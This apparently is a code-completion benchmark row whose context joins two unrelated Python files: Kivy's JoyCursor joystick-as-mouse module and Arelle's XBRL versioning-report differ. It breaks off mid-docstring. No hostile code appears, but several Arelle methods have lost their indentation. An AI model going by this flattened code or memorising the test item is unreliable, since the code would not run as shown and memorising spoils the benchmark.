gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
'''
JoyCursor
=========
.. versionadded:: 1.10.0
The JoyCursor is a tool for navigating with a joystick as if using a mouse
or touch. Most of the actions that are possible for a mouse user are available
in this module.
For example:
* left click
* right click
* double click (two clicks)
* moving the cursor
* holding the button (+ moving at the same time)
* selecting
* scrolling
There are some properties that can be edited live, such as intensity of the
JoyCursor movement and toggling mouse button holding.
Usage
-----
For normal module usage, please see the :mod:`~kivy.modules` documentation
and these bindings:
+------------------+--------------------+
| Event | Joystick |
+==================+====================+
| cursor move | Axis 3, Axis 4 |
+------------------+--------------------+
| cursor intensity | Button 0, Button 1 |
+------------------+--------------------+
| left click | Button 2 |
+------------------+--------------------+
| right click | Button 3 |
+------------------+--------------------+
| scroll up | Button 4 |
+------------------+--------------------+
| scroll down | Button 5 |
+------------------+--------------------+
| hold button | Button 6 |
+------------------+--------------------+
| joycursor on/off | Button 7 |
+------------------+--------------------+
The JoyCursor, like Inspector, can also be imported and used as a normal
python module. This has the added advantage of being able to activate and
deactivate the module programmatically::
from kivy.lang import Builder
from kivy.base import runTouchApp
runTouchApp(Builder.load_string("""
#:import jc kivy.modules.joycursor
BoxLayout:
Button:
text: 'Press & activate with Ctrl+E or Button 7'
on_release: jc.create_joycursor(root.parent, root)
Button:
text: 'Disable'
on_release: jc.stop(root.parent, root)
"""))
'''
__all__ = ('start', 'stop', 'create_joycursor')
from kivy.clock import Clock
from kivy.logger import Logger
from kivy.uix.widget import Widget
from kivy.graphics import Color, Line
from kivy.properties import (
ObjectProperty,
NumericProperty,
BooleanProperty
)
class JoyCursor(Widget):
    '''Crosshair cursor widget that is moved with a joystick and dispatches
    synthetic mouse events on the Window, letting a joystick act as a mouse
    (see the module docstring for the button/axis bindings).
    '''
    # the Window the cursor is attached to (set by create_joycursor)
    win = ObjectProperty()
    # True while the cursor is visible and bound to joystick events
    activated = BooleanProperty(False)
    # width of the white crosshair lines (the outline is drawn 0.1 wider)
    cursor_width = NumericProperty(1.1)
    # while True, on_mouse_up is not dispatched, emulating a held button
    cursor_hold = BooleanProperty(False)
    # pixels the cursor moves per clock tick on an active axis
    intensity = NumericProperty(4)
    # raw axis values within (-dead_zone, dead_zone) are ignored (no drift)
    dead_zone = NumericProperty(10000)
    # per-tick movement applied by move_cursor (set in check_cursor)
    offset_x = NumericProperty(0)
    offset_y = NumericProperty(0)
    def __init__(self, **kwargs):
        super(JoyCursor, self).__init__(**kwargs)
        # guard so on_window_children ignores its own remove/add cycle
        self.avoid_bring_to_top = False
        self.size_hint = (None, None)
        # odd-sized square so the crosshair has an exact center pixel
        self.size = (21, 21)
        self.set_cursor()
        # draw cursor
        with self.canvas:
            # blue outline underneath, slightly wider than the white lines
            Color(rgba=(0.19, 0.64, 0.81, 0.5))
            self.cursor_ox = Line(
                points=self.cursor_pts[:4],
                width=self.cursor_width + 0.1
            )
            self.cursor_oy = Line(
                points=self.cursor_pts[4:],
                width=self.cursor_width + 0.1
            )
            # white crosshair on top
            Color(rgba=(1, 1, 1, 0.5))
            self.cursor_x = Line(
                points=self.cursor_pts[:4],
                width=self.cursor_width
            )
            self.cursor_y = Line(
                points=self.cursor_pts[4:],
                width=self.cursor_width
            )
        # park the cursor off-screen until activated
        self.pos = [-i for i in self.size]
    def on_window_children(self, win, *args):
        # pull JoyCursor to the front when added
        # as a child directly to the window.
        if self.avoid_bring_to_top:
            return
        # re-adding ourselves retriggers this handler; the flag breaks the loop
        self.avoid_bring_to_top = True
        win.remove_widget(self)
        win.add_widget(self)
        self.avoid_bring_to_top = False
    def on_activated(self, instance, activated):
        # bind/unbind when JoyCursor's state is changed
        if activated:
            self.win.add_widget(self)
            # poll every frame to apply the current axis offsets
            self.move = Clock.schedule_interval(self.move_cursor, 0)
            self.win.fbind('on_joy_axis', self.check_cursor)
            self.win.fbind('on_joy_button_down', self.set_intensity)
            self.win.fbind('on_joy_button_down', self.check_dispatch)
            # real mouse movement pins the cursor to the mouse position
            self.win.fbind('mouse_pos', self.stop_cursor)
            mouse_pos = self.win.mouse_pos
            # center the crosshair on the current mouse position
            self.pos = (
                mouse_pos[0] - self.size[0] / 2.0,
                mouse_pos[1] - self.size[1] / 2.0
            )
            Logger.info('JoyCursor: joycursor activated')
        else:
            # park off-screen and undo every binding made above
            self.pos = [-i for i in self.size]
            Clock.unschedule(self.move)
            self.win.funbind('on_joy_axis', self.check_cursor)
            self.win.funbind('on_joy_button_down', self.set_intensity)
            self.win.funbind('on_joy_button_down', self.check_dispatch)
            self.win.funbind('mouse_pos', self.stop_cursor)
            self.win.remove_widget(self)
            Logger.info('JoyCursor: joycursor deactivated')
    def set_cursor(self, *args):
        # create cursor points
        # first 4 values: horizontal segment, last 4: vertical segment
        px, py = self.pos
        sx, sy = self.size
        self.cursor_pts = [
            px, py + round(sy / 2.0), px + sx, py + round(sy / 2.0),
            px + round(sx / 2.0), py, px + round(sx / 2.0), py + sy
        ]
    def check_cursor(self, win, stickid, axisid, value):
        # check axes and set offset if a movement is registered
        intensity = self.intensity
        dead = self.dead_zone
        if axisid == 3:
            if value < -dead:
                self.offset_x = -intensity
            elif value > dead:
                self.offset_x = intensity
            else:
                self.offset_x = 0
        elif axisid == 4:
            # invert Y axis to behave like mouse
            if value < -dead:
                self.offset_y = intensity
            elif value > dead:
                self.offset_y = -intensity
            else:
                self.offset_y = 0
        else:
            # any other axis stops the movement
            self.offset_x = 0
            self.offset_y = 0
    def set_intensity(self, win, stickid, buttonid):
        # set intensity of joycursor with joystick buttons
        # button 0 slows down (minimum of 2 px/tick), button 1 speeds up
        intensity = self.intensity
        if buttonid == 0 and intensity > 2:
            intensity -= 1
        elif buttonid == 1:
            intensity += 1
        self.intensity = intensity
    def check_dispatch(self, win, stickid, buttonid):
        # translate joystick buttons into synthetic mouse events
        if buttonid == 6:
            # toggle "hold" mode; the mouse_down dispatched below then stays held
            self.cursor_hold = not self.cursor_hold
        if buttonid not in (2, 3, 4, 5, 6):
            return
        x, y = self.center
        # window event, correction necessary
        # (window mouse events use a top-left origin, widgets use bottom-left)
        y = self.win.system_size[1] - y
        modifiers = []
        actions = {
            2: 'left',
            3: 'right',
            4: 'scrollup',
            5: 'scrolldown',
            6: 'left'
        }
        button = actions[buttonid]
        self.win.dispatch('on_mouse_down', x, y, button, modifiers)
        # while holding, the button-up is suppressed until hold is toggled off
        if not self.cursor_hold:
            self.win.dispatch('on_mouse_up', x, y, button, modifiers)
    def move_cursor(self, *args):
        # move joycursor as a mouse
        self.pos[0] += self.offset_x
        self.pos[1] += self.offset_y
        modifiers = []
        if self.cursor_hold:
            # emulate dragging while the held button is down
            self.win.dispatch(
                'on_mouse_move',
                self.center[0],
                self.win.system_size[1] - self.center[1],
                modifiers
            )
    def stop_cursor(self, instance, mouse_pos):
        # pin the cursor to the mouse pos
        # (real mouse movement takes over and cancels joystick motion)
        self.offset_x = 0
        self.offset_y = 0
        self.pos = (
            mouse_pos[0] - self.size[0] / 2.0,
            mouse_pos[1] - self.size[1] / 2.0
        )
    def on_pos(self, instance, new_pos):
        # recompute and push the crosshair line points on every move
        self.set_cursor()
        self.cursor_x.points = self.cursor_pts[:4]
        self.cursor_y.points = self.cursor_pts[4:]
        self.cursor_ox.points = self.cursor_pts[:4]
        self.cursor_oy.points = self.cursor_pts[4:]
    def keyboard_shortcuts(self, win, scancode, *args):
        # Ctrl+E (scancode 101) toggles the cursor; Escape (27) deactivates it
        modifiers = args[-1]
        if scancode == 101 and modifiers == ['ctrl']:
            self.activated = not self.activated
            return True
        elif scancode == 27:
            if self.activated:
                self.activated = False
                return True
    def joystick_shortcuts(self, win, stickid, buttonid):
        # Button 7 toggles the cursor; on activation start at the window center
        if buttonid == 7:
            self.activated = not self.activated
            if self.activated:
                self.pos = [round(i / 2.0) for i in win.size]
def create_joycursor(win, ctx, *args):
    '''Create a JoyCursor instance attached to the *ctx* and bound to the
    Window's :meth:`~kivy.core.window.WindowBase.on_keyboard` event for
    capturing the keyboard shortcuts.
    :Parameters:
        `win`: A :class:`Window <kivy.core.window.WindowBase>`
            The application Window to bind to.
        `ctx`: A :class:`~kivy.uix.widget.Widget` or subclass
            The Widget for JoyCursor to attach to.
    '''
    cursor = JoyCursor(win=win)
    ctx.joycursor = cursor
    # keep the cursor drawn on top of newly added widgets and watch Ctrl+E
    win.bind(children=cursor.on_window_children,
             on_keyboard=cursor.keyboard_shortcuts)
    # always listen for joystick input to open the module
    # (like a keyboard listener)
    win.fbind('on_joy_button_down', cursor.joystick_shortcuts)
def start(win, ctx):
    '''Schedule creation of a JoyCursor for *ctx* on the next clock tick.'''
    Clock.schedule_once(lambda *_: create_joycursor(win, ctx))
def stop(win, ctx):
    '''Stop and unload any active JoyCursors for the given *ctx*.
    '''
    if not hasattr(ctx, 'joycursor'):
        return
    cursor = ctx.joycursor
    # deactivating undoes the joystick/mouse bindings made on activation
    cursor.activated = False
    win.unbind(children=cursor.on_window_children,
               on_keyboard=cursor.keyboard_shortcuts)
    win.funbind('on_joy_button_down', cursor.joystick_shortcuts)
    win.remove_widget(cursor)
    del ctx.joycursor
|
|
'''
Created on Nov 11, 2010
@author: Mark V Systems Limited
(c) Copyright 2010-2013 Mark V Systems Limited, All rights reserved.
'''
import os, re, datetime
from collections import defaultdict
from arelle import (XbrlConst, XbrlUtil, XmlUtil, UrlUtil, ModelXbrl, ModelDocument, ModelVersObject,
Version, XmlValidate)
from arelle.ModelDtsObject import ModelConcept
from arelle.ModelObject import ModelObject
from arelle.ModelValue import qname, QName
from arelle.FileSource import FileNamedStringIO
def create(modelXbrlFromDTS, modelXbrlToDTS, reportOutput=None):
    """Returns a new modelXbrl representing a Version Report object, by creation of its modelXbrl, its ModelVersReport (modelDocument), and diffing the from and to DTSes

    :param modelXbrlFromDTS: fromDTS DTS object
    :type modelXbrlFromDTS: ModelXbrl
    :param modelXbrlToDTS: toDTS DTS object
    :type modelXbrlToDTS: ModelXbrl
    :param reportOutput: file name (or FileNamedStringIO) the versioning
        report is written to by diffDTSes
    """
    modelXbrlVersReport = ModelXbrl.create(modelXbrlFromDTS.modelManager)
    # ModelVersReport.__init__ requires the owning modelXbrl as its first
    # argument; the document type is passed via the keyword parameter
    modelVersReport = ModelVersReport(
        modelXbrlVersReport, type=ModelDocument.Type.VERSIONINGREPORT)
    modelXbrlVersReport.modelDocument = modelVersReport
    # diffDTSes' first parameter is the report output target
    modelVersReport.diffDTSes(reportOutput, modelXbrlFromDTS, modelXbrlToDTS)
    return modelVersReport
# arc attributes ignored when comparing relationship arcs between DTSes
relationshipSetArcAttributesExclusion = {
    "{http://www.w3.org/1999/xlink}from",
    "{http://www.w3.org/1999/xlink}to",
    "{http://www.w3.org/1999/xlink}actuate",
    "{http://www.w3.org/1999/xlink}show",
    "{http://www.w3.org/1999/xlink}title",
    "{http://www.w3.org/XML/1998/namespace}lang",
    "{http://www.w3.org/XML/1998/namespace}space",
    "id", "use","priority","order"
}
# taxonomy authority URIs treated as equivalent when matching role/namespace URIs
authoritiesEquivalence = {
    "http://xbrl.iasb.org": "IFRS", "http://xbrl.ifrs.org": "IFRS",
    "http://xbrl.us": "XBRL-US", "http://fasb.org": "XBRL-US", "http://xbrl.sec.gov": "XBRL-US",
}
# matches a date (optionally "draft-" prefixed) in a URI path, e.g. "/2012-01-31"
dateRemovalPattern = re.compile(r"[/]?(draft-)?(19|20)[0-9][0-9](-[01][0-9](-[0-3][0-9])?)?")
# matches a run of digits/dots in a URI path segment (optionally with leading "/")
numberRemovalPattern = re.compile(r"[/]?[0-9][0-9\.]*")
class ModelVersReport(ModelDocument.ModelDocument):
    """
    .. class:: ModelVersReport(modelXbrl, type=ModelDocument.Type.VERSIONINGREPORT, uri=None, filepath=None, xmlDocument=None)

    ModelVersReport is a specialization of ModelDocument for Versioning Reports.

    (for parameters and inherited attributes, please see ModelDocument)

    .. attribute:: fromDTS

       From DTS (modelXbrl object)

    .. attribute:: toDTS

       To DTS (modelXbrl object)

    .. attribute:: assignments

       Dict by id of ModelAssignment objects

    .. attribute:: actions

       Dict by id of ModelAction objects

    .. attribute:: namespaceRenameFrom

       Dict by fromURI of ModelNamespaceRename objects

    .. attribute:: namespaceRenameTo

       Dict by toURI of ModelNamespaceRename objects

    .. attribute:: roleChanges

       Dict by uri of ModelRoleChange objects

    .. attribute:: conceptUseChanges

       List of ModelConceptUseChange objects

    .. attribute:: conceptDetailsChanges

       List of ModelConceptDetailsChange objects

    .. attribute:: equivalentConcepts

       Dict by qname of equivalent qname

    .. attribute:: relatedConcepts

       DefaultDict by qname of set of related concept qnames

    .. attribute:: relationshipSetChanges

       List of relationship-set change event objects

    .. attribute:: instanceAspectChanges

       List of ModelInstanceAspectChange objects

    .. attribute:: typedDomainsCorrespond

       Dict by (fromDimConcept,toDimConcept) of bool that is True if corresponding
    """
    def __init__(self, modelXbrl,
                 type=ModelDocument.Type.VERSIONINGREPORT,
                 uri=None, filepath=None, xmlDocument=None):
        """Initialize the versioning report document (see the class docstring
        and ModelDocument for the parameters)."""
        super(ModelVersReport, self).__init__(modelXbrl, type, uri, filepath, xmlDocument)
        self.fromDTS = None  # from DTS (ModelXbrl); set by discovery or diffDTSes
        self.toDTS = None  # to DTS (ModelXbrl); set by discovery or diffDTSes
        self.assignments = {}  # ModelAssignment objects by id
        self.actions = {}  # ModelAction objects by id
        self.namespaceRenameFrom = {}  # ModelNamespaceRename objects by fromURI
        self.namespaceRenameFromURI = {}  # toURI by fromURI (filled by diffNamespaces)
        self.namespaceRenameTo = {}  # ModelNamespaceRename objects by toURI
        self.namespaceRenameToURI = {}  # fromURI by toURI (filled by diffNamespaces)
        self.roleChanges = {}  # ModelRoleChange objects by uri
        self.conceptUseChanges = []  # concept add/delete/rename change objects
        self.conceptDetailsChanges = []  # concept attribute/label/reference change objects
        self.equivalentConcepts = {}  # equivalent qname by qname
        self.relatedConcepts = defaultdict(set)  # related concept qnames by qname
        self.relationshipSetChanges = []  # relationship-set change event objects
        self.instanceAspectChanges = []  # instance aspect change event objects
        self.typedDomainsCorrespond = {}  # bool by (fromDimConcept, toDimConcept)
    def close(self, *args, **kwargs):
        """Closes any views, formula output instances, modelDocument(s), and dereferences all memory used
        """
        # all cleanup is delegated to ModelDocument.close
        super(ModelVersReport, self).close(*args, **kwargs)
def versioningReportDiscover(self, rootElement):
"""Initiates discovery of versioning report
:param rootElement: lxml root element of versioning report
:type rootElement: xml element node
"""
XmlValidate.validate(self.modelXbrl, rootElement) # schema validate
actionRelatedFromMdlObjs = []
actionRelatedToMdlObjs = []
modelAction = None
# add self to namespaced document
self.xmlRootElement = rootElement
try:
for modelObject in rootElement.iterdescendants():
if isinstance(modelObject, ModelObject):
ln = modelObject.localName
ns = modelObject.namespaceURI
if ns == XbrlConst.ver:
if ln == "action":
ModelVersObject.relateConceptMdlObjs(self, actionRelatedFromMdlObjs, actionRelatedToMdlObjs)
modelAction = modelObject
actionRelatedFromMdlObjs = []
actionRelatedToMdlObjs = []
elif (ln == "fromDTS" or ln == "toDTS") and not getattr(self, ln):
schemaRefElts = XmlUtil.children(modelObject, XbrlConst.link, "schemaRef")
if schemaRefElts:
if len(schemaRefElts) == 1 and schemaRefElts[0].get("{http://www.w3.org/1999/xlink}href") is not None:
DTSmodelXbrl = ModelXbrl.load(self.modelXbrl.modelManager,
schemaRefElts[0].get("{http://www.w3.org/1999/xlink}href"),
"loading validation report",
base=self.baseForElement(schemaRefElts[0]))
else: # need multi-schemaRefs DTS
DTSmodelXbrl = ModelXbrl.create(self.modelXbrl.modelManager,
newDocumentType=ModelDocument.Type.DTSENTRIES,
url=self.uri[:-4] + "-" + ln + ".dts", isEntry=True)
DTSdoc = DTSmodelXbrl.modelDocument
DTSdoc.inDTS = True
for schemaRefElt in schemaRefElts:
if schemaRefElt.get("{http://www.w3.org/1999/xlink}href") is not None:
doc = ModelDocument.load(DTSmodelXbrl,
schemaRefElt.get("{http://www.w3.org/1999/xlink}href"),
base=self.baseForElement(schemaRefElt))
DTSdoc.referencesDocument[doc] = "import" #fake import
doc.inDTS = True
if DTSmodelXbrl is not None:
setattr(self, ln, DTSmodelXbrl)
elif ln in ("namespaceRename", "roleChange"):
if modelAction is not None:
modelAction.events.append(modelObject)
elif self.fromDTS is None or self.toDTS is None:
pass
elif ns in (XbrlConst.vercu, XbrlConst.vercb):
if ln in ("conceptRename", "conceptAdd", "conceptDelete"):
if modelAction is not None:
modelAction.events.append(modelObject)
if ln == "conceptRename":
modelObject.setConceptEquivalence()
elif ln == "conceptDelete":
actionRelatedFromMdlObjs.append(modelObject)
elif ln == "conceptAdd":
actionRelatedToMdlObjs.append(modelObject)
elif ns in (XbrlConst.vercd, XbrlConst.verce):
if ln in {"conceptIDChange", "conceptTypeChange", "conceptSubstitutionGroupChange",
"conceptDefaultChange", "conceptNillableChange",
"conceptAbstractChange", "conceptBlockChange", "conceptFixedChange",
"conceptFinalChange", "conceptPeriodTypeChange", "conceptBalanceChange",
"conceptAttributeAdd", "conceptAttributeDelete", "conceptAttributeChange",
"tupleContentModelChange",
"conceptLabelAdd", "conceptLabelDelete", "conceptLabelChange",
"conceptReferenceAdd", "conceptReferenceDelete", "conceptReferenceChange"}:
if modelAction is not None:
modelAction.events.append(modelObject)
elif ns == XbrlConst.verrels:
if ln in {"relationshipSetModelChange", "relationshipSetModelAdd", "relationshipSetModelDelete"}:
if modelAction is not None:
modelAction.events.append(modelObject)
modelRelationshipSetEvent = modelObject
elif ln in ("fromRelationshipSet", "toRelationshipSet"):
if modelRelationshipSetEvent is not None:
modelRelationshipSet = modelObject
if ln == "fromRelationshipSet":
modelRelationshipSetEvent.fromRelationshipSet = modelObject
else:
modelRelationshipSetEvent.toRelationshipSet = modelObject
modelObject.modelRelationshipSetEvent = modelRelationshipSetEvent
elif ln == "relationships":
if modelRelationshipSet is not None:
modelRelationshipSet.relationships.append(modelObject)
modelObject.modelRelationshipSet = modelRelationshipSet
elif ns in (XbrlConst.verdim, XbrlConst.veria):
if ln in ("aspectModelChange", "aspectModelAdd", "aspectModelDelete"):
if modelAction is not None:
modelAction.events.append(modelObject)
aspectModelEvent = modelObject
modelAspects = None
elif ln in ("fromAspects", "toAspects"):
if aspectModelEvent is not None:
modelAspects = modelObject
if ln == "fromAspects":
aspectModelEvent.fromAspects = modelObject
else:
aspectModelEvent.toAspects = modelObject
modelObject.aspectModelEvent = aspectModelEvent
elif ln in ("concepts", "explicitDimension", "typedDimension", "segment", "scenario",
"entityIdentifier", "period", "location", "unit"):
modelAspect = modelObject
if modelAspects is not None:
modelAspects.aspects.append(modelObject)
modelObject.modelAspects = modelAspects
modelMulDivBy = None
elif ln in ("concept", "member"):
if modelAspect is not None:
modelAspect.relatedConcepts.append(modelObject)
modelObject.modelAspect = modelAspect
elif ln in ("startDate", "endDate", "instant", "forever"):
if modelAspect is not None:
modelAspect.relatedPeriods.append(modelObject)
modelObject.modelAspect = modelAspect
elif ln in ("multiplyBy", "divideBy"):
if modelAspect is not None:
modelAspect.relatedMeasures.append(modelObject)
modelObject.modelAspect = modelAspect
modelMulDivBy = modelObject
elif ln == "measure":
if modelMulDivBy is not None:
modelMulDivBy.relatedMeasures.append(modelObject)
modelObject.modelAspect = modelMulDivBy
elif modelAspect is not None:
modelAspect.relatedMeasures.append(modelObject)
modelObject.modelAspect = modelAspect
ModelVersObject.relateConceptMdlObjs(self, actionRelatedFromMdlObjs, actionRelatedToMdlObjs)
# do linkbaseRef's at end after idObjects all loaded
for element in rootElement.iterdescendants("{http://www.xbrl.org/2003/linkbase}linkbaseRef"):
self.schemaLinkbaseRefDiscover(element)
except (ValueError, LookupError) as err:
self.modelXbrl.modelManager.addToLog("discovery: {0} error {1}".format(
os.path.basename(self.uri),
err))
def entryURIs(self, DTS):
if DTS.modelDocument:
if DTS.modelDocument.type == ModelDocument.Type.DTSENTRIES:
return sorted([mdlDoc.uri for mdlDoc in DTS.modelDocument.referencesDocument.keys()])
else:
return [DTS.uri]
return []
    def diffDTSes(self, reportOutput, fromDTS, toDTS, assignment="technical", schemaDir=None):
        """Initiates diffing of fromDTS and toDTS, populating the ModelVersReport object, and saving the
        versioning report file.

        :param reportOutput: file name (or FileNamedStringIO) to save the versioning report
        :type reportOutput: str or FileNamedStringIO
        :param fromDTS: first modelXbrl's (DTSes) to be diffed
        :type fromDTS: ModelXbrl
        :param toDTS: second modelXbrl's (DTSes) to be diffed
        :type toDTS: ModelXbrl
        :param assignment: 'technical', 'business', etc. for the assignment clause
        :type assignment: str
        :param schemaDir: Directory for determination of relative path for versioning xsd files (versioning-base.xsd, etc).
        :type schemaDir: str
        """
        versReportFile = str(reportOutput) # may be a FileNamedStringIO, in which case str( ) is the filename
        self.uri = os.path.normpath(versReportFile)
        from arelle import FileSource
        self.modelXbrl.fileSource = FileSource.FileSource(self.uri)
        self.fromDTS = fromDTS
        self.toDTS = toDTS
        # map the assignment keyword onto a category element name
        assignment = assignment.lower()
        if ":" in assignment: categoryType = assignment
        elif assignment.startswith("technical"): categoryType = "technicalCategory"
        elif assignment.startswith("business"): categoryType = "businessCategory"
        else: categoryType = "errataCategory"
        # build the skeleton report document as a string, then parse it below
        import io
        file = io.StringIO(
            #'<?xml version="1.0" encoding="UTF-8"?>'
            '<nsmap>' # for lxml expandable namespace purposes
            '<!-- Generated by Arelle(r) version {3} at {4} -->'
            '<report'
            ' xmlns="http://xbrl.org/2013/versioning-base"'
            ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"'
            ' xmlns:link="http://www.xbrl.org/2003/linkbase"'
            ' xmlns:xlink="http://www.w3.org/1999/xlink"'
            # for generated testcases the schema locations need to be relative to test case directory
            #' xsi:schemaLocation="'
            # 'http://xbrl.org/2010/versioning-base http://xbrl.org/2010/versioning-base '
            # 'http://xbrl.org/2010/versioning-concept-basic http://xbrl.org/2010/versioning-concept-basic '
            # 'http://xbrl.org/2010/versioning-concept-extended http://xbrl.org/2010/versioning-concept-extended '
            #'"
            '>'
            '<!-- link:linkbaseRef xlink:type="simple"'
            ' xlink:arcrole="http://www.w3.org/1999/xlink/properties/linkbase"'
            ' xlink:title="documentation"'
            ' xlink:href="sample.xml"/ -->'
            '<fromDTS>{0}</fromDTS>'
            '<toDTS>{1}</toDTS>'
            '<assignment id="versioningTask"><{2}/></assignment>'
            '</report></nsmap>'.format(
                ''.join(['<link:schemaRef xlink:type="simple" xlink:href="{0}"/>'.format(self.relativeUri(uri))
                         for uri in self.entryURIs(fromDTS)]),
                ''.join(['<link:schemaRef xlink:type="simple" xlink:href="{0}"/>'.format(self.relativeUri(uri))
                         for uri in self.entryURIs(toDTS)]),
                categoryType,
                Version.version,
                format(datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M UTC")))
            )
        from arelle.ModelObjectFactory import parser
        self.parser, self.parserLookupName, self.parserLookupClass = parser(self.modelXbrl,None)
        from lxml import etree
        self.xmlDocument = etree.parse(file,parser=self.parser,base_url=self.uri)
        file.close()
        self.xmlDocument.getroot().init(self)
        # run each comparison phase on the report element
        # (the _ below is arelle's globally installed gettext function)
        for self.reportElement in self.xmlDocument.iter(tag="{http://xbrl.org/2013/versioning-base}report"):
            self.xmlRootElement = self.reportElement
            self.actionNum = 1
            self.modelXbrl.modelManager.showStatus(_("Comparing namespaces"))
            self.diffNamespaces()
            self.modelXbrl.modelManager.showStatus(_("Comparing roles"))
            self.diffRoles()
            self.modelXbrl.modelManager.showStatus(_("Comparing concepts"))
            self.diffConcepts()
            for arcroleUri in (XbrlConst.parentChild, XbrlConst.summationItem, XbrlConst.essenceAlias, XbrlConst.requiresElement, XbrlConst.generalSpecial):
                self.modelXbrl.modelManager.showStatus(_("Comparing {0} relationships").format(os.path.basename(arcroleUri)))
                self.diffRelationshipSet(arcroleUri)
            self.modelXbrl.modelManager.showStatus(_("Comparing dimension defaults"))
            self.diffDimensionDefaults()
            self.modelXbrl.modelManager.showStatus(_("Comparing explicit dimensions"))
            self.diffDimensions()
            # determine namespaces
            schemaLocations = []
            if schemaDir is not None:
                schemasRelPath = os.path.relpath(schemaDir, os.path.dirname(versReportFile)) + os.sep
                # NOTE(review): "prefix" actually iterates namespace URIs (nsmap values)
                for prefix in self.reportElement.nsmap.values():
                    if prefix == XbrlConst.ver:
                        schemaLocations.append(XbrlConst.ver)
                        schemaLocations.append(schemasRelPath + "versioning-base.xsd")
                    elif prefix == XbrlConst.vercu:
                        schemaLocations.append(XbrlConst.vercu)
                        schemaLocations.append(schemasRelPath + "versioning-concept-use.xsd")
                    elif prefix == XbrlConst.vercd:
                        schemaLocations.append(XbrlConst.vercd)
                        schemaLocations.append(schemasRelPath + "versioning-concept-details.xsd")
                    elif prefix == XbrlConst.verrels:
                        schemaLocations.append(XbrlConst.verrels)
                        schemaLocations.append(schemasRelPath + "versioning-relationship-sets.xsd")
                    elif prefix == XbrlConst.verdim:
                        schemaLocations.append(XbrlConst.verdim)
                        schemaLocations.append(schemasRelPath + "versioning-dimensions.xsd")
                    elif prefix == XbrlConst.veria:
                        schemaLocations.append(XbrlConst.veria)
                        schemaLocations.append(schemasRelPath + "versioning-instance-aspects.xsd")
                self.reportElement.set("{http://www.w3.org/2001/XMLSchema-instance}schemaLocation",
                                       " ".join(schemaLocations))
            self.modelXbrl.modelManager.showStatus(_("Checking report file"))
            self.modelXbrl.modelDocument = self # model document is now established
            # re-discover the generated report to validate and wire its objects
            self.versioningReportDiscover(self.reportElement)
            self.modelXbrl.modelManager.showStatus(_("Writing report file"))
            if isinstance(reportOutput, FileNamedStringIO):
                fh = reportOutput
            else:
                fh = open(versReportFile, "w", encoding="utf-8")
            XmlUtil.writexml(fh, self.xmlDocument, encoding="utf-8")
            # a FileNamedStringIO is the caller's object; don't close it here
            if not isinstance(reportOutput, FileNamedStringIO):
                fh.close()
            self.filepath = versReportFile
            # NOTE(review): status message looks truncated ("C report file") — confirm intended text
            self.modelXbrl.modelManager.showStatus(_("C report file"))
            self.modelXbrl.modelManager.showStatus(_("ready"), 2000)
def diffNamespaces(self):
# build fomr and to lists based on namespaces
self.namespaceRenameFromURI = {}
self.namespaceRenameToURI = {}
fromNSes = set()
toNSes = set()
for fromModelDoc in self.fromDTS.urlDocs.values():
if fromModelDoc.type == ModelDocument.Type.SCHEMA:
fromNSes.add(fromModelDoc.targetNamespace)
for toModelDoc in self.toDTS.urlDocs.values():
if toModelDoc.type == ModelDocument.Type.SCHEMA:
toNSes.add(toModelDoc.targetNamespace)
self.diffURIs( fromNSes, toNSes,
"namespaceRename",
(self.rolePathlessDatelessMatchPattern, self.roleNumlessMatchPattern, self.roleNoFromToMatchPattern),
self.namespaceRenameFromURI, self.namespaceRenameToURI)
def diffRoles(self):
self.roleChangeFromURI = {}
self.roleChangeToURI = {}
self.diffURIs( set( self.fromDTS.roleTypes.keys() ),
set( self.toDTS.roleTypes.keys() ),
"roleChange",
(self.rolePathlessDatelessMatchPattern, self.roleNumlessMatchPattern, self.roleNoFromToMatchPattern),
self.roleChangeFromURI, self.roleChangeToURI )
    def diffURIs(self, fromURIs, toURIs, eventName, matchers, changeFrom, changeTo):
        """Match disappeared fromURIs with appeared toURIs, emitting an
        *eventName* event for each match and recording the mapping.

        :param fromURIs: set of URIs only in the from DTS (mutated: matched URIs removed)
        :param toURIs: set of URIs only in the to DTS (mutated: matched URIs removed)
        :param eventName: versioning event element name, e.g. "namespaceRename"
        :param matchers: URI-normalizing functions tried in order; earlier
            (stricter) matchers claim URIs before later, looser ones run
        :param changeFrom: dict receiving toURI by fromURI
        :param changeTo: dict receiving fromURI by toURI
        """
        # remove common roles from each
        commonRoles = fromURIs & toURIs
        fromURIs -= commonRoles
        toURIs -= commonRoles
        for matcher in matchers:
            # look for roles matching on matcher subpattern
            fromMatchURIs = defaultdict(list)
            toMatchURIs = defaultdict(list)
            # try to URIs based on numbers in uri path removed (e.g., ignoring dates)
            for matchURIs, origURIs in ((fromMatchURIs,fromURIs),(toMatchURIs,toURIs)):
                for uri in origURIs:
                    matchURIs[matcher(uri)].append(uri)
            for fromMatchURI, fromMatchedURIs in fromMatchURIs.items():
                for toURI in toMatchURIs.get(fromMatchURI,[]):
                    for fromURI in fromMatchedURIs:
                        self.createBaseEvent(eventName, fromURI, toURI)
                        changeFrom[fromURI] = toURI
                        changeTo[toURI] = fromURI
                        # removed from consideration by next pass on final path segment
                        fromURIs.discard(fromURI)
                        toURIs.discard(toURI)
def uriNumlessMatchPattern(self, uri):
# remove date and numbers from uri (for now, more sophisticated later)
return ''.join((c if str.isalpha(c) or c == '/' else '') for c in uri)
def roleNumlessMatchPattern(self, role):
# remove date and numbers from role except last path segment
basepart, sep, lastpart = role.rpartition("/")
return ''.join((c if str.isalpha(c) or c == '/' else '') for c in basepart) + \
((sep + lastpart) if lastpart else "")
def rolePathlessDatelessMatchPattern(self, role):
# remove date from path (including / if immediately before date)
datelessRole = dateRemovalPattern.sub("", role)
# remove intermediate role path elements between authority and end path segment (after date removal)
basepart, sep, lastpart = datelessRole.rpartition("/")
origAuthority = UrlUtil.authority(role)
matchedAuthority = authoritiesEquivalence.get(origAuthority,origAuthority)
return matchedAuthority + ((sep + lastpart) if lastpart else "")
def roleNoFromToMatchPattern(self, role):
# remove intermediate role path elements between authority and end path segment
# for roland test case generation
basepart, sep, lastpart = role.rpartition("/")
if lastpart.endswith("_to"):
lastpart = lastpart[:-3]
elif lastpart.endswith("_from"):
lastpart = lastpart[:-5]
return UrlUtil.authority(role) + ((sep + lastpart) if lastpart else "")
    def diffConcepts(self):
        """Compare the concepts of fromDTS and toDTS.

        Emits concept-use events (conceptAdd/conceptDelete) for unmatched
        concepts and concept-details events (ID, type, substitution group,
